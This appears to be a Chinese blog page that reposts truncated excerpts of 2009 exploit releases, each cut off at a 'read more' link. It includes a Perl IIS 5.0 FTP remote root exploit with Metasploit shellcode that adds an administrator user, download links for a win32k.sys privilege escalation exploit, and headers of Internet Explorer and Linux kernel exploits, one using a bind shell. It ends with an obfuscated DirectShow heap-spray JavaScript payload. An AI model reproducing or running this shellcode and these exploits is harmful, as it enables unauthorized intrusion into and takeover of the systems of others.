大西瓜的杂货铺

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .  
阅读全文

From:  SecuriTeam

This summer may have caused a few burden’s on linux administrators. By all the patching necessary to keep their systems out of the hands of those who would choose to exploit it, unless your using something like Ksplice, you’ve more than likely rebooted many times already. Well, here is one more reason to wake this early this morning…

New exploits for the “Linux NULL pointer dereference due to incorrect proto_ops initializations” vulnerability have been released, here and here. I just tried the second one out myself on a (currently) fully updated Ubuntu Jaunty workstation, with (_default_) successful results.

阅读全文

////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | Microsoft Corporation - http://www.microsoft.com/                          | //
// |                                                                            | //
// | Affected Software:                                                         | //
// | Windows XP Service Pack 2                                                  | //
// | Windows XP Service Pack 3                                                  | //
// |                                                                            | //
// | Affected Driver:                                                           | //
// | Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796                      | //
// |                                                                            | //
// | Local Privilege Escalation Exploit                                         | //
// | For Educational Purposes Only !                                            | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 30 July 2009                                                               | //
// |                                                                            | //
// | References:                                                                | //
// | Exploiting Common Flaws in Drivers                                         | //
// | Ruben Santamarta - http://www.reversemode.com/                             | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

Exploit:

http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip

back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip

Description:

http://www.ntinternals.org/index.html#09_07_30

# milw0rm.com [2009-07-30]

From:milw0rm

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Based on the code posted at http://www.milw0rm.com/exploits/9163
#   - Tested using:
#     > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed
#     > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed
#
#   Usage  : python ie_owc.py [port (between 1024 and 65535)] 
阅读全文

From: milw0rm

/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
   A vulnerability which, when viewed at the source level, is unexploitable!
   But which, thanks to gcc optimizations, becomes exploitable 
   Also, bypass of mmap_min_addr via SELinux vulnerability!
   (where having SELinux enabled actually increases your risk against a
    large class of kernel vulnerabilities)
 
阅读全文

milw0rm.com [2009-07-10]

#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################

# #
# Tested on Windows 2003 SP2 R2, XPSP3 IE7 #
# #
# Written by SecureState R&D Team #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #

阅读全文

来源：Xeye

Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。

关键代码如下：
————————-以下内容有危险，仅为研究使用————–

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" + 
阅读全文